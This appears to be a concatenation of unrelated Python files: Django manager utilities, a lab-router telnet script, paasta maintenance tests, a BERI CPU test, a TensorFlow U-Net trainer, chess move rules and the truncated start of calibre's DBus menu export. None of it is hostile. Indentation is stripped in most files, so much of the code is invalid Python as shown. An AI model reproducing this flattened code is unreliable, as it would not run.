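        window += window // 2  # exponential back-off: window *= 1.5
    return max(MIN_RETRY_WAIT, min(window, MAX_RETRY_WAIT))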
# import signals
# Do not remove this import, its required for the signals code to run even though not explicitly used in this file
from corehq.apps.repeaters import signals
|
from types import ClassType
import warnings
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields.related import OneToOneField
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
import django
class InheritanceQuerySet(QuerySet):
def select_subclasses(self, *subclasses):
if not subclasses:
subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()
if isinstance(rel.field, OneToOneField)
and issubclass(rel.field.model, self.model)]
new_qs = self.select_related(*subclasses)
new_qs.subclasses = subclasses
return new_qs
def _clone(self, klass=None, setup=False, **kwargs):
for name in ['subclasses', '_annotated']:
if hasattr(self, name):
kwargs[name] = getattr(self, name)
return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)
def annotate(self, *args, **kwargs):
qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs)
qset._annotated = [a.default_alias for a in args] + kwargs.keys()
return qset
def get_subclass(self, obj):
"""
FIX see https://bitbucket.org/carljm/django-model-utils/pull-request/5/patch-to-issue-16/diff
and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses
"""
def get_attribute(obj, s):
try:
                return getattr(obj, s, False)
except obj.__class__.DoesNotExist:
return False
if django.VERSION[0:2] < (1, 5):
sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]
else:
sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]
return sub_obj[0]
def iterator(self):
iter = super(InheritanceQuerySet, self).iterator()
if getattr(self, 'subclasses', False):
for obj in iter:
sub_obj = self.get_subclass(obj)
if getattr(self, '_annotated', False):
for k in self._annotated:
setattr(sub_obj, k, getattr(obj, k))
yield sub_obj
else:
for obj in iter:
yield obj
class InheritanceManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
return InheritanceQuerySet(self.model)
def select_subclasses(self, *subclasses):
return self.get_query_set().select_subclasses(*subclasses)
def get_subclass(self, *args, **kwargs):
return self.get_query_set().select_subclasses().get(*args, **kwargs)
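# Hedged usage sketch for InheritanceManager (model names are illustrative,
# kept in comments so no model is registered at import time):
# class Place(models.Model):
#     objects = InheritanceManager()
# class Restaurant(Place):
#     serves_pizza = models.BooleanField(default=False)
# Place.objects.select_subclasses() then yields Restaurant instances for rows
# that have one, instead of plain Place instances.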
class InheritanceCastMixin(object):
def cast(self):
results = tuple(self.values_list('pk', 'real_type'))
type_to_pks = {}
for pk, real_type_id in results:
type_to_pks.setdefault(real_type_id, []).append(pk)
content_types = ContentType.objects.in_bulk(type_to_pks.keys())
pk_to_child = {}
for real_type_id, pks in type_to_pks.iteritems():
content_type = content_types[real_type_id]
child_type = content_type.model_class()
children = child_type._default_manager.in_bulk(pks)
for pk, child in children.iteritems():
pk_to_child[pk] = child
children = []
# sort children into same order as parents where returned
for pk, real_type_id in results:
children.append(pk_to_child[pk])
return children
class QueryManager(models.Manager):
def __init__(self, *args, **kwargs):
if args:
self._q = args[0]
else:
self._q = models.Q(**kwargs)
super(QueryManager, self).__init__()
def order_by(self, *args):
self._order_by = args
return self
def get_query_set(self):
qs = super(QueryManager, self).get_query_set().filter(self._q)
if hasattr(self, '_order_by'):
return qs.order_by(*self._order_by)
return qs
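# Hedged usage sketch for QueryManager (illustrative model, comments only):
# class Post(models.Model):
#     status = models.CharField(max_length=20)
#     public = QueryManager(status='public').order_by('-pk')
# Post.public.all() is then pre-filtered to status='public' and pre-ordered.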
class PassThroughManager(models.Manager):
"""
Inherit from this Manager to enable you to call any methods from your
custom QuerySet class from your manager. Simply define your QuerySet
class, and return an instance of it from your manager's `get_query_set`
method.
Alternately, if you don't need any extra methods on your manager that
aren't on your QuerySet, then just pass your QuerySet class to the
``for_queryset_class`` class method.
class PostQuerySet(QuerySet):
def enabled(self):
return self.filter(disabled=False)
class Post(models.Model):
objects = PassThroughManager.for_queryset_class(PostQuerySet)()
"""
# pickling causes recursion errors
_deny_methods = ['__getstate__', '__setstate__', '_db']
def __init__(self, queryset_cls=None):
self._queryset_cls = queryset_cls
super(PassThroughManager, self).__init__()
def __getattr__(self, name):
if name in self._deny_methods:
raise AttributeError(name)
return getattr(self.get_query_set(), name)
def get_query_set(self):
if self._queryset_cls is not None:
kargs = {'model': self.model}
if hasattr(self, '_db'):
kargs['using'] = self._db
return self._queryset_cls(**kargs)
return super(PassThroughManager, self).get_query_set()
@classmethod
def for_queryset_class(cls, queryset_cls):
class _PassThroughManager(cls):
def __init__(self):
return super(_PassThroughManager, self).__init__()
def get_query_set(self):
kwargs = {}
if hasattr(self, "_db"):
kwargs["using"] = self._db
return queryset_cls(self.model, **kwargs)
return _PassThroughManager
def manager_from(*mixins, **kwds):
"""
Returns a Manager instance with extra methods, also available and
chainable on generated querysets.
(By George Sakkis, originally posted at
http://djangosnippets.org/snippets/2117/)
:param mixins: Each ``mixin`` can be either a class or a function. The
generated manager and associated queryset subclasses extend the mixin
classes and include the mixin functions (as methods).
:keyword queryset_cls: The base queryset class to extend from
(``django.db.models.query.QuerySet`` by default).
:keyword manager_cls: The base manager class to extend from
(``django.db.models.manager.Manager`` by default).
"""
warnings.warn(
"manager_from is pending deprecation; use PassThroughManager instead.",
PendingDeprecationWarning,
stacklevel=2)
# collect separately the mixin classes and methods
bases = [kwds.get('queryset_cls', QuerySet)]
methods = {}
for mixin in mixins:
if isinstance(mixin, (ClassType, type)):
bases.append(mixin)
else:
try: methods[mixin.__name__] = mixin
except AttributeError:
raise TypeError('Mixin must be class or function, not %s' %
mixin.__class__)
# create the QuerySet subclass
id = hash(mixins + tuple(kwds.iteritems()))
new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods)
# create the Manager subclass
bases[0] = manager_cls = kwds.get('manager_cls', Manager)
new_manager_cls = type('Manager_%d' % id, tuple(bases), methods)
# and finally override new manager's get_query_set
super_get_query_set = manager_cls.get_query_set
def get_query_set(self):
# first honor the super manager's get_query_set
qs = super_get_query_set(self)
# and then try to bless the returned queryset by reassigning it to the
# newly created Queryset class, though this may not be feasible
if not issubclass(new_queryset_cls, qs.__class__):
raise TypeError('QuerySet subclass conflict: cannot determine a '
'unique class for queryset instance')
qs.__class__ = new_queryset_cls
return qs
new_manager_cls.get_query_set = get_query_set
return new_manager_cls()
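# Hedged usage sketch for manager_from: each mixin function becomes a method
# on both the generated manager and its querysets. The model is illustrative
# and left in comments to avoid registering it at import time.
def _published(self):
    return self.filter(published=True)
# class Post(models.Model):
#     published = models.BooleanField(default=False)
#     objects = manager_from(_published)
# Post.objects.published() and Post.objects.all().published() both work.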
|
#!/usr/bin/env python
'''
Class-based version.
Write a script that connects to the lab pynet-rtr1, logs in, and executes the
'show ip int brief' command.
'''
import telnetlib
import time
import socket
import sys
import getpass
TELNET_PORT = 23
TELNET_TIMEOUT = 6
class TelnetConn(object):
'''
Telnet connection for cisco style network devices
'''
def __init__(self, ip_addr, username, password):
self.ip_addr = ip_addr
self.username = username
self.password = password
try:
self.remote_conn = telnetlib.Telnet(self.ip_addr, TELNET_PORT, TELNET_TIMEOUT)
except socket.timeout:
            sys.exit('Connection timed out')
def send_command(self, cmd):
'''
Send a command down the telnet channel
Return the response
'''
cmd = cmd.rstrip()
self.remote_conn.write(cmd + '\n')
time.sleep(1)
return self.remote_conn.read_very_eager()
def login(self):
'''
Login to network device
'''
output = self.remote_conn.read_until("sername:", TELNET_TIMEOUT)
self.remote_conn.write(self.username + '\n')
output += self.remote_conn.read_until("ssword:", TELNET_TIMEOUT)
self.remote_conn.write(self.password + '\n')
return output
def disable_paging(self, paging_cmd='terminal length 0'):
'''
Disable the paging of output (i.e. --More--)
'''
return self.send_command(paging_cmd)
def close(self):
'''
Close telnet connection
'''
return self.remote_conn.close()
def main():
'''
    Connect to the lab pynet-rtr1, log in, and execute the
    'show ip int brief' command.
'''
ip_addr = raw_input("IP address: ")
ip_addr = ip_addr.strip()
username = 'pyclass'
password = getpass.getpass()
telnet_conn = TelnetConn(ip_addr, username, password)
telnet_conn.login()
telnet_conn.disable_paging()
output = telnet_conn.send_command('show ip int brief')
print "\n\n"
print output
print "\n\n"
telnet_conn.close()
if __name__ == "__main__":
main()
|
# Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from paasta_tools import paasta_maintenance
@mock.patch("paasta_tools.mesos_maintenance.is_host_drained", autospec=True)
@mock.patch(
"paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start", autospec=True
)
def test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained):
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = []
assert not paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = ["blah"]
assert paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = ["blah"]
assert paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = []
assert paasta_maintenance.is_safe_to_kill("blah")
@mock.patch("paasta_tools.paasta_maintenance.is_hostname_local", autospec=True)
def test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,):
mock_is_hostname_local.return_value = False
assert paasta_maintenance.is_safe_to_drain("non-localhost") is False
@mock.patch("paasta_tools.paasta_maintenance.getfqdn", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.gethostname", autospec=True)
def test_is_hostname_local_works(mock_gethostname, mock_getfqdn):
mock_gethostname.return_value = "foo"
mock_getfqdn.return_value = "foo.bar"
assert paasta_maintenance.is_hostname_local("localhost") is True
assert paasta_maintenance.is_hostname_local("foo") is True
assert paasta_maintenance.is_hostname_local("foo.bar") is True
assert paasta_maintenance.is_hostname_local("something_different") is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
def test_are_local_tasks_in_danger_fails_safe_with_false(
mock_load_system_paasta_config,
):
"""If something unexpected happens that we don't know how to
interpret, we make sure that we fail with "False" so that processes
move on and don't deadlock. In general the answer to "is it safe to drain"
is "yes" if mesos can't be reached, etc"""
mock_load_system_paasta_config.side_effect = Exception
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
def test_are_local_tasks_in_danger_is_false_with_nothing_running(
mock_marathon_services_running_here, mock_load_system_paasta_config
):
mock_marathon_services_running_here.return_value = []
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
def test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service(
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = False
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is False
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.synapse_replication_is_low", autospec=True)
def test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger(
mock_synapse_replication_is_low,
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = True
mock_synapse_replication_is_low.return_value = True
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is True
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
assert mock_synapse_replication_is_low.call_count == 1
@mock.patch(
"paasta_tools.paasta_maintenance.load_marathon_service_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.load_smartstack_info_for_service", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace",
autospec=True,
)
@mock.patch(
"paasta_tools.paasta_maintenance.get_replication_for_services", autospec=True
)
def test_synapse_replication_is_low_understands_underreplicated_services(
mock_get_replication_for_services,
mock_get_expected_instance_count_for_namespace,
mock_load_smartstack_info_for_service,
mock_load_marathon_service_config,
):
mock_load_marathon_service_config.return_value.get_registrations.return_value = (
"service.main"
)
mock_get_expected_instance_count_for_namespace.return_value = 3
mock_load_smartstack_info_for_service.return_value = {
"local_region": {"service.main": "up"}
}
mock_get_replication_for_services.return_value = {"service.main": 1}
local_backends = ["foo"]
system_paasta_config = mock.MagicMock()
assert (
paasta_maintenance.synapse_replication_is_low(
service="service",
instance="instance",
system_paasta_config=system_paasta_config,
local_backends=local_backends,
)
is True
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_haproxy_healthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = "192.0.2.1"
local_port = 42
backends = [
{"status": "UP", "pxname": "service.main", "svname": "192.0.2.1:42_hostname"}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is True
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = "192.0.2.1"
local_port = 42
backends = [
{"status": "DOWN", "pxname": "service.main", "svname": "192.0.2.1:42_hostname"}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname,):
mock_gethostbyname.return_value = "192.0.2.1"
local_port = 42
backends = [
{
"status": "DOWN",
"pxname": "service.main",
"svname": "192.0.2.4:666_otherhostname",
}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
|
#-
# Copyright (c) 2011 Robert N. M. Watson
# All rights reserved.
#
# This software was developed by SRI International and the University of
# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237
# ("CTSRD"), as part of the DARPA CRASH research programme.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
class test_tne_eq(BaseBERITestCase):
def test_tne_handled(self):
self.assertRegisterEqual(self.MIPS.a2, 0, "tne trapped when equal")
|
import tensorflow as tf
import math
import numpy as np
import os
import pickle
import time
from learning.input_data import input_data
import sys
def learn_model(trainingset_path, model_path, model_restored_path=None, learning_rate=None, verbose=1):
    if not learning_rate:
        learning_rate = 0.0005
    # Miscellaneous variables
Loss = []
Epoch = []
Accuracy = []
Report = ''
# Training or Predicting
restore = True
# Results and Models
folder_model = model_path
if not os.path.exists(folder_model):
os.makedirs(folder_model)
display_step = 100
save_step = 600
# Network Parameters
image_size = 256
n_input = image_size * image_size
n_classes = 2
dropout = 0.75
depth = 6
hyperparameters = {'depth': depth,'dropout': dropout, 'image_size': image_size,
'model_restored_path': model_restored_path, 'restore': restore}
    with open(folder_model + '/hyperparameters.pkl', 'wb') as handle:
pickle.dump(hyperparameters, handle)
# Optimization Parameters
batch_size = 1
training_iters = 500000
epoch_size = 200
Report += '\n\n---Savings---'
Report += '\n Model saved in : '+ folder_model
Report += '\n\n---PARAMETERS---\n'
Report += 'learning_rate : '+ str(learning_rate)+'; \n batch_size : ' + str(batch_size) +';\n depth : ' + str(depth) \
+';\n epoch_size: ' + str(epoch_size)+';\n dropout : ' + str(dropout)+';\n restore : ' + str(restore)\
+';\n (if model restored) restored_model :' + str(model_restored_path)
data_train = input_data(trainingset_path=trainingset_path, type='train')
data_test = input_data(trainingset_path=trainingset_path, type='test')
# Graph input
x = tf.placeholder(tf.float32, shape=(batch_size, image_size, image_size))
y = tf.placeholder(tf.float32, shape=(batch_size*n_input, n_classes))
keep_prob = tf.placeholder(tf.float32)
# Create some wrappers for simplicity
def conv2d(x, W, b, strides=1):
# Conv2D wrapper, with bias and relu activation
x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='SAME')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def maxpool2d(x, k=2):
# MaxPool2D wrapper
return tf.nn.max_pool(x, ksize=[1, k, k, 1], strides=[1, k, k, 1],
padding='SAME')
# Create model
    def conv_net(x, weights, biases, dropout, image_size=image_size):
# Reshape input picture
x = tf.reshape(x, shape=[-1, image_size, image_size, 1])
data_temp = x
data_temp_size = [image_size]
relu_results = []
# contraction
for i in range(depth):
conv1 = conv2d(data_temp, weights['wc1'][i], biases['bc1'][i])
conv2 = conv2d(conv1, weights['wc2'][i], biases['bc2'][i])
relu_results.append(conv2)
conv2 = maxpool2d(conv2, k=2)
data_temp_size.append(data_temp_size[-1]/2)
data_temp = conv2
conv1 = conv2d(data_temp, weights['wb1'], biases['bb1'])
conv2 = conv2d(conv1, weights['wb2'], biases['bb2'])
data_temp_size.append(data_temp_size[-1])
data_temp = conv2
# expansion
for i in range(depth):
data_temp = tf.image.resize_images(data_temp, data_temp_size[-1] * 2, data_temp_size[-1] * 2)
upconv = conv2d(data_temp, weights['upconv'][i], biases['upconv'][i])
data_temp_size.append(data_temp_size[-1]*2)
upconv_concat = tf.concat(concat_dim=3, values=[tf.slice(relu_results[depth-i-1], [0, 0, 0, 0],
[-1, data_temp_size[depth-i-1], data_temp_size[depth-i-1], -1]), upconv])
conv1 = conv2d(upconv_concat, weights['we1'][i], biases['be1'][i])
conv2 = conv2d(conv1, weights['we2'][i], biases['be2'][i])
data_temp = conv2
finalconv = tf.nn.conv2d(conv2, weights['finalconv'], strides=[1, 1, 1, 1], padding='SAME')
final_result = tf.reshape(finalconv, tf.TensorShape([finalconv.get_shape().as_list()[0] * data_temp_size[-1] * data_temp_size[-1], 2]))
return final_result
weights = {'wc1':[],'wc2':[],'we1':[],'we2':[],'upconv':[],'finalconv':[],'wb1':[], 'wb2':[]}
biases = {'bc1':[],'bc2':[],'be1':[],'be2':[],'finalconv_b':[],'bb1':[], 'bb2':[],'upconv':[]}
# Contraction
for i in range(depth):
if i == 0:
num_features_init = 1
num_features = 64
else:
num_features = num_features_init * 2
# Store layers weight & bias
weights['wc1'].append(tf.Variable(tf.random_normal([3, 3, num_features_init, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features_init)))), name = 'wc1-%s'%i))
weights['wc2'].append(tf.Variable(tf.random_normal([3, 3, num_features, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name = 'wc2-%s'%i))
biases['bc1'].append(tf.Variable(tf.random_normal([num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='bc1-%s'%i))
biases['bc2'].append(tf.Variable(tf.random_normal([num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='bc2-%s'%i))
image_size = image_size/2
num_features_init = num_features
num_features = num_features_init*2
weights['wb1']= tf.Variable(tf.random_normal([3, 3, num_features_init, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features_init)))),name='wb1-%s'%i)
weights['wb2']= tf.Variable(tf.random_normal([3, 3, num_features, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='wb2-%s'%i)
    biases['bb1'] = tf.Variable(tf.random_normal([num_features]), name='bb1-%s' % i)
biases['bb2']= tf.Variable(tf.random_normal([num_features]), name='bb2-%s'%i)
num_features_init = num_features
for i in range(depth):
num_features = num_features_init/2
weights['upconv'].append(tf.Variable(tf.random_normal([2, 2, num_features_init, num_features]), name='upconv-%s'%i))
biases['upconv'].append(tf.Variable(tf.random_normal([num_features]), name='bupconv-%s'%i))
weights['we1'].append(tf.Variable(tf.random_normal([3, 3, num_features_init, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features_init)))), name='we1-%s'%i))
weights['we2'].append(tf.Variable(tf.random_normal([3, 3, num_features, num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='we2-%s'%i))
biases['be1'].append(tf.Variable(tf.random_normal([num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='be1-%s'%i))
biases['be2'].append(tf.Variable(tf.random_normal([num_features], stddev=math.sqrt(2.0/(9.0*float(num_features)))), name='be2-%s'%i))
num_features_init = num_features
weights['finalconv']= tf.Variable(tf.random_normal([1, 1, num_features, n_classes]), name='finalconv-%s'%i)
biases['finalconv_b']= tf.Variable(tf.random_normal([n_classes]), name='bfinalconv-%s'%i)
# Construct model
pred = conv_net(x, weights, biases, keep_prob)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y))
tf.scalar_summary('Loss', cost)
index = tf.Variable(0, trainable=False)
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# Evaluate model
correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
mask = tf.argmax(pred, 1)
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
init = tf.initialize_all_variables()
saver = tf.train.Saver(tf.all_variables())
summary_op = tf.merge_all_summaries()
# Launch the graph
Report += '\n\n---Intermediary results---\n'
with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:
last_epoch = 0
        if model_restored_path:
            folder_restored_model = model_restored_path
            saver.restore(sess, folder_restored_model + "/model.ckpt")
            # the evolution file was pickled in binary mode, so read it back in 'rb'
            file = open(folder_restored_model + '/evolution.pkl', 'rb')
            evolution_restored = pickle.load(file)
            file.close()
            last_epoch = evolution_restored["steps"][-1]
else:
sess.run(init)
print 'training start'
step = 1
epoch = 1 + last_epoch
while step * batch_size < training_iters:
batch_x, batch_y = data_train.next_batch(batch_size, rnd = True, augmented_data= True)
sess.run(optimizer, feed_dict={x: batch_x, y: batch_y,
keep_prob: dropout})
if step % display_step == 0:
# Calculate batch loss and accuracy
loss, acc, p = sess.run([cost, accuracy, pred], feed_dict={x: batch_x,
y: batch_y,
keep_prob: 1., index: step*batch_size})
prediction = data_train.read_batch(p, batch_size)[0, :, :, 0]
ground_truth = data_train.read_batch(batch_y, batch_size)[0, :, :, 0]
if verbose == 2:
outputs = "Iter " + str(step*batch_size) + ", Minibatch Loss= " + \
"{:.6f}".format(loss) + ", Training Accuracy= " + \
"{:.5f}".format(acc)
print outputs
            if step % epoch_size == 0:
start = time.time()
A = []
L = []
print epoch
data_test.set_batch_start()
print data_test.batch_start
for i in range(data_test.set_size):
batch_x, batch_y = data_test.next_batch(batch_size, rnd=False, augmented_data= False)
loss, acc = sess.run([cost, accuracy], feed_dict={x: batch_x, y: batch_y, keep_prob: 1.})
A.append(acc)
L.append(loss)
if verbose >= 1:
print '--\nAccuracy on patch'+str(i)+': '+str(acc)
print 'Loss on patch'+str(i)+': '+str(loss)
Accuracy.append(np.mean(A))
Loss.append(np.mean(L))
Epoch.append(epoch)
output_2 = '\n----\n Epoch: ' + str(epoch)
output_2+= '\n Accuracy: ' + str(np.mean(A))+';'
output_2+= '\n Loss: ' + str(np.mean(L))+';'
print '\n\n----Scores on test:---' + output_2
Report+= output_2
epoch+=1
if step % save_step == 0:
evolution = {'loss': Loss, 'steps': Epoch, 'accuracy': Accuracy}
with open(folder_model+'/evolution.pkl', 'wb') as handle:
pickle.dump(evolution, handle)
save_path = saver.save(sess, folder_model+"/model.ckpt")
print("Model saved in file: %s" % save_path)
file = open(folder_model+"/report.txt", 'w')
file.write(Report)
file.close()
step += 1
save_path = saver.save(sess, folder_model+"/model.ckpt")
evolution = {'loss': Loss, 'steps': Epoch, 'accuracy': Accuracy}
        with open(folder_model + '/evolution.pkl', 'wb') as handle:
pickle.dump(evolution, handle)
print("Model saved in file: %s" % save_path)
print "Optimization Finished!"
if __name__ == "__main__":
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--path_training", required=True, help="")
ap.add_argument("-m", "--path_model", required=True, help="")
ap.add_argument("-m_init", "--path_model_init", required=False, help="")
ap.add_argument("-lr", "--learning_rate", required=False, help="")
args = vars(ap.parse_args())
path_training = args["path_training"]
path_model = args["path_model"]
path_model_init = args["path_model_init"]
learning_rate = args["learning_rate"]
    if learning_rate:
        learning_rate = float(args["learning_rate"])
    else:
        learning_rate = None
learn_model(path_training, path_model, path_model_init, learning_rate)
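# Example invocation, assuming this file is saved as learn_model.py (filename
# and paths are illustrative):
#   python learn_model.py -p ./trainingset -m ./models/run1 -lr 0.0005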
|
'''
Created on Jul 9, 2016
@author: farid
'''
from definitions import *
class chessman():
    def __init__(self, cell, color):
'''
Constructor
'''
self._color = color
self._cell = cell
def is_legal_move(self):
pass
    def is_legal_capture(self, new_cell):
        pass
def get_short_name(self):
return type(self).__name__[0]
@property
def row(self):
return self._cell.row
@property
def col(self):
return self._cell.col
class Pawn(chessman):
    def is_legal_move(self, new_cell):
        # pawns move along a file; a two-square advance is only allowed from
        # the starting rank (row 2 for white, row 7 for black)
        if self.col == new_cell.col:
            if self._color == WHITE:
                if self.row == 2 and (new_cell.row - self.row == 1 or new_cell.row - self.row == 2):
                    return True
                elif self.row > 2 and new_cell.row - self.row == 1:
                    return True
            else:
                if self.row == 7 and (new_cell.row - self.row == -1 or new_cell.row - self.row == -2):
                    return True
                elif self.row < 7 and new_cell.row - self.row == -1:
                    return True
        return False
    def is_legal_capture(self, new_cell):
        if self._color == WHITE:
            if (abs(self.col - new_cell.col), new_cell.row - self.row) == (1, 1):
                return True
        else:
            if (abs(self.col - new_cell.col), new_cell.row - self.row) == (1, -1):
                return True
        return False
class Knight(chessman):
    def is_legal_move(self, new_cell):
        delta = (abs(self.col - new_cell.col), abs(new_cell.row - self.row))
        if delta == (1, 2) or delta == (2, 1):
            return True
        return False
def get_short_name(self):
return 'N'
class Bishop(chessman):
    def is_legal_move(self, new_cell):
        if abs(self.col - new_cell.col) == abs(new_cell.row - self.row):
            return True
        return False
class Rook(chessman):
    def is_legal_move(self, new_cell):
        if self.col == new_cell.col or new_cell.row == self.row:
            return True
        return False
class Queen(chessman):
    def is_legal_move(self, new_cell):
        if self.col == new_cell.col or new_cell.row == self.row:
            return True
        elif abs(self.col - new_cell.col) == abs(new_cell.row - self.row):
            return True
        return False
class King(chessman):
    def is_legal_move(self, new_cell):
        if abs(self.col - new_cell.col) <= 1 and abs(new_cell.row - self.row) <= 1:
            return True
        return False
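# A small self-contained check of the move rules above. _StubCell is a
# hypothetical stand-in for the Cell type from `definitions`, used only so
# this sketch does not depend on that type's real constructor.
class _StubCell(object):
    def __init__(self, row, col):
        self.row = row
        self.col = col
def _example_knight_move():
    # a knight on (row=1, col=2) can reach (row=3, col=3): the delta is (1, 2)
    knight = Knight(_StubCell(1, 2), WHITE)
    return knight.is_legal_move(_StubCell(3, 3))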
|
#!/usr/bin/env python
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>'
# Support for exporting Qt's MenuBars/Menus over DBUS. The API is defined in
# dbus-menu.xml from the libdbusmenu project https://launchpad.net/libdbusmenu
import dbus
from PyQt5.Qt import (
QApplication, QMenu, QIcon, QKeySequence, QObject, QEvent, QTimer, pyqtSignal, Qt)
from calibre.utils.dbus_service import Object, BusName, method as dbus_method, dbus_property, signal as dbus_signal
from calibre.gui2.dbus_export.utils import (
setup_for_cli_run, swap_mnemonic_char, key_sequence_to_dbus_shortcut, icon_to_dbus_menu_icon)
null = object()
def PropDict(mapping=()):
return dbus.Dictionary(mapping, signature='sv')
def create_properties_for_action(ac, previous=None):
ans = PropDict()
if ac.isSeparator():
ans['type'] = 'separator'
if not ac.isVisible():
ans['visible'] = False
return ans
text = ac.text() or ac.iconText()
if text:
ans['label'] = swap_mnemonic_char(text)
if not ac.isEnabled():
ans['enabled'] = False
if not ac.isVisible() or ac.property('blocked') is True:
ans['visible'] = False
if ac.menu() is not None:
ans['children-display'] = 'submenu'
if ac.isCheckable():
exclusive = ac.actionGroup() is not None and ac.actionGroup().isExclusive()
ans['toggle-type'] = 'radio' if exclusive else 'checkmark'
ans['toggle-state'] = int(ac.isChecked())
shortcuts = ac.shortcuts()
if shortcuts:
